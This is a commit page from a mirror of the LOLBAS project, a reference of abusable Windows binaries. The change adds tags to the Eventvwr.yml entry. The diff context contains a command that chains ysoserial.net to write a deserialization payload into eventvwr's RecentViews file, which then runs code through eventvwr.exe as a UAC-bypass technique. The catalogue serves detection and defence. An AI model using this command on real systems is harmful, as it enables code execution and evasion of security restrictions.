public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Adding tags (closes #9, #318) (#362)

Browse Source 
* Adding various tags as a first iteration

* Adding quotes

* Adding 'Custom Format' properly

* Updating to key:value pairs

* Update template
This commit is contained in:
Wietze
2024-04-03 16:53:36 +01:00
committed by GitHub
parent a945bac6be
commit ebbf08ec4d
65 changed files with 229 additions and 66 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/Eventvwr.yml
View File

@@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe